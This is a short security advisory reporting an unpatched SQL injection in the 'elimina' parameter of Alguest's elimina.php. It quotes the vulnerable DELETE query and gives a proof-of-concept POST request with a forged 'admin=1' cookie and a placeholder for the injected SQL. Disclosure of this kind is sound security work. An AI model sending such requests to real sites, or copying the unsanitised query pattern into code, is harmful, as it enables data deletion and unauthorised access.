Alguest version 1.1c-patched suffers from a remote SQL injection vulnerability.
74e5612ef1e3a3fcde68e11c4ca0783489410e5644105238488d6626356aed4c
www.eVuln.com advisory:
"elimina" SQL Injection vulnerability in Alguest
Summary: http://evuln.com/vulns/173/summary.html
Details: http://evuln.com/vulns/173/description.html
-----------Summary-----------
eVuln ID: EV0173
Software: Alguest
Vendor: n/a
Version: 1.1c-patched
Critical Level: medium
Type: SQL Injection
Status: Unpatched. No reply from developer(s)
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject arbitrary SQL query using "elimina" parameter
in "elimina.php" script.
Parameter "elimina" is used in SQL query without any sanitation.
--------PoC/Exploit--------
SQL Injection Example
Vulnerable code: $query = "DELETE FROM guest WHERE id=$elimina";
SQL Injection PoC:
POST /alguest/elimina.php HTTP/1.0
Host: website
Cookie: admin=1
Content-Length: N
send=elimina&elimina=[SQL Injection]
---------Solution----------
Not available
----------Credit-----------
Vulnerability discovered by Aliaksandr Hartsuyeu
http://evuln.com/ - how to secure website